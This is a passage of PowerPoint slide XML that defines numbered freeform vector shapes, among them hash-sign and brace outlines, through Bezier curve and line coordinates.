                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>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3"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="139"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4" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>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2" y="189"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>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2"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="140"/>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7"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
                      <a:pt x="69" y="189"/>
                      <a:pt x="69" y="192"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="194"/>
                      <a:pt x="70" y="195"/>
                      <a:pt x="70" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="195"/>
                      <a:pt x="73" y="193"/>
                      <a:pt x="72" y="191"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="188"/>
                      <a:pt x="70" y="186"/>
                      <a:pt x="69" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="184"/>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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="172"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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8"/>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7"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4"/>
                      <a:pt x="139" y="131"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="135"/>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2"/>
                      <a:pt x="97" y="51"/>
                      <a:pt x="94" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="49"/>
                      <a:pt x="91" y="47"/>
                      <a:pt x="91" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="43"/>
                      <a:pt x="91" y="42"/>
                      <a:pt x="92" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="37"/>
                      <a:pt x="95" y="36"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="42"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="49"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="39"/>
                      <a:pt x="105" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="29"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="30"/>
                      <a:pt x="88" y="33"/>
                      <a:pt x="87" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="39"/>
                      <a:pt x="87" y="40"/>
                      <a:pt x="87" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="43"/>
                      <a:pt x="87" y="45"/>
                      <a:pt x="87" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="45"/>
                      <a:pt x="83" y="46"/>
                      <a:pt x="81" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                      <a:pt x="80" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="46"/>
                      <a:pt x="78" y="45"/>
                      <a:pt x="78" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="41"/>
                      <a:pt x="77" y="39"/>
                      <a:pt x="76" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="35"/>
                      <a:pt x="76" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="32"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="32"/>
                      <a:pt x="66" y="34"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="50"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="48"/>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1" y="66"/>
                      <a:pt x="74" y="66"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="62"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="58"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="63"/>
                      <a:pt x="92" y="65"/>
                      <a:pt x="86" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="69"/>
                      <a:pt x="72" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="73" y="45"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="43"/>
                      <a:pt x="73" y="41"/>
                      <a:pt x="72" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="40"/>
                      <a:pt x="71" y="40"/>
                      <a:pt x="71" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="40"/>
                      <a:pt x="70" y="41"/>
                      <a:pt x="70" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="41"/>
                      <a:pt x="72" y="43"/>
                      <a:pt x="72" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="44"/>
                      <a:pt x="72" y="45"/>
                      <a:pt x="73" y="45"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="97" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="99" y="40"/>
                      <a:pt x="99" y="42"/>
                      <a:pt x="100" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="43"/>
                      <a:pt x="101" y="43"/>
                      <a:pt x="101" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="41"/>
                      <a:pt x="100" y="40"/>
                      <a:pt x="99"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Freeform 157"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2672" y="407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Freeform 158"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2684" y="4073"/>
                <a:ext cx="5" cy="2"/>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Freeform 159"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2043"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Freeform 160"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 161"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2342" y="2562"/>
                <a:ext cx="82"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Freeform 162"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="249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Freeform 163"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2687"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Freeform 164"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2837"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8" name="Freeform 165"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="298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Freeform 166"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3182"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Freeform 167"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3332"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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="46"/>
                      <a:pt x="18" y="48"/>
                      <a:pt x="14"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Freeform 168"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="371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Freeform 169"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3905"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Freeform 170"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="410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2" y="36"/>
                      <a:pt x="17" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="18"/>
                      <a:pt x="30" y="11"/>
                      <a:pt x="38" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="2"/>
                      <a:pt x="55"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Freeform 171"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4285" y="2567"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 68 h 219"/>
                  <a:gd name="T2" fmla="*/ 184 w 189"/>
                  <a:gd name="T3" fmla="*/ 86 h 219"/>
                  <a:gd name="T4" fmla="*/ 141 w 189"/>
                  <a:gd name="T5" fmla="*/ 86 h 219"/>
                  <a:gd name="T6" fmla="*/ 130 w 189"/>
                  <a:gd name="T7" fmla="*/ 136 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 136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3 w 189"/>
                  <a:gd name="T31" fmla="*/ 136 h 219"/>
                  <a:gd name="T32" fmla="*/ 48 w 189"/>
                  <a:gd name="T33" fmla="*/ 136 h 219"/>
                  <a:gd name="T34" fmla="*/ 57 w 189"/>
                  <a:gd name="T35" fmla="*/ 86 h 219"/>
                  <a:gd name="T36" fmla="*/ 11 w 189"/>
                  <a:gd name="T37" fmla="*/ 86 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 68 h 219"/>
                  <a:gd name="T40" fmla="*/ 61 w 189"/>
                  <a:gd name="T41" fmla="*/ 68 h 219"/>
                  <a:gd name="T42" fmla="*/ 74 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 219"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 219"/>
                  <a:gd name="T46" fmla="*/ 82 w 189"/>
                  <a:gd name="T47" fmla="*/ 68 h 219"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 68 h 219"/>
                  <a:gd name="T50" fmla="*/ 138 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 219"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 68 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 68 h 219"/>
                  <a:gd name="T58" fmla="*/ 121 w 189"/>
                  <a:gd name="T59" fmla="*/ 86 h 219"/>
                  <a:gd name="T60" fmla="*/ 78 w 189"/>
                  <a:gd name="T61" fmla="*/ 86 h 219"/>
                  <a:gd name="T62" fmla="*/ 67 w 189"/>
                  <a:gd name="T63" fmla="*/ 136 h 219"/>
                  <a:gd name="T64" fmla="*/ 110 w 189"/>
                  <a:gd name="T65" fmla="*/ 136 h 219"/>
                  <a:gd name="T66" fmla="*/ 121 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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8"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="68"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="121" y="86"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121"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Freeform 172"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4502"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Freeform 173"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="469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Freeform 174"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4894"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Freeform 175"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5043" y="256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Freeform 176"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5241" y="2562"/>
                <a:ext cx="82"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Freeform 177"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5389"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Freeform 178"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5539"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2" name="Freeform 179"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5687"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Freeform 180"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5877" y="2567"/>
                <a:ext cx="78" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 64"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 22 w 64"/>
                  <a:gd name="T3" fmla="*/ 198 h 241"/>
                  <a:gd name="T4" fmla="*/ 22 w 64"/>
                  <a:gd name="T5" fmla="*/ 157 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 64"/>
                  <a:gd name="T7" fmla="*/ 128 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 64"/>
                  <a:gd name="T9" fmla="*/ 113 h 241"/>
                  <a:gd name="T10" fmla="*/ 22 w 64"/>
                  <a:gd name="T11" fmla="*/ 83 h 241"/>
                  <a:gd name="T12" fmla="*/ 22 w 64"/>
                  <a:gd name="T13" fmla="*/ 43 h 241"/>
                  <a:gd name="T14" fmla="*/ 64 w 64"/>
                  <a:gd name="T15" fmla="*/ 0 h 241"/>
                  <a:gd name="T16" fmla="*/ 64 w 64"/>
                  <a:gd name="T17" fmla="*/ 18 h 241"/>
                  <a:gd name="T18" fmla="*/ 42 w 64"/>
                  <a:gd name="T19" fmla="*/ 45 h 241"/>
                  <a:gd name="T20" fmla="*/ 42 w 64"/>
                  <a:gd name="T21" fmla="*/ 85 h 241"/>
                  <a:gd name="T22" fmla="*/ 21 w 64"/>
                  <a:gd name="T23" fmla="*/ 120 h 241"/>
                  <a:gd name="T24" fmla="*/ 21 w 64"/>
                  <a:gd name="T25" fmla="*/ 121 h 241"/>
                  <a:gd name="T26" fmla="*/ 42 w 64"/>
                  <a:gd name="T27" fmla="*/ 156 h 241"/>
                  <a:gd name="T28" fmla="*/ 42 w 64"/>
                  <a:gd name="T29" fmla="*/ 195 h 241"/>
                  <a:gd name="T30" fmla="*/ 47 w 64"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 64 w 64"/>
                  <a:gd name="T33" fmla="*/ 224 h 241"/>
                  <a:gd name="T34" fmla="*/ 64 w 64"/>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241"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="36" y="241"/>
                      <a:pt x="22" y="226"/>
                      <a:pt x="22" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                      <a:pt x="22" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="139"/>
                      <a:pt x="14" y="129"/>
                      <a:pt x="0" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="22" y="102"/>
                      <a:pt x="22" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                      <a:pt x="22" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="15"/>
                      <a:pt x="36" y="1"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64" y="18"/>
                      <a:pt x="64"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3"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="223"/>
                      <a:pt x="64" y="224"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64"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Freeform 181"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5985" y="2567"/>
                <a:ext cx="77" cy="295"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 128 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 157 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 198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1" y="139"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>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9" y="112"/>
                      <a:pt x="63" y="113"/>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Freeform 182"/>
              <p:cNvSpPr>
                <a:spLocks/>
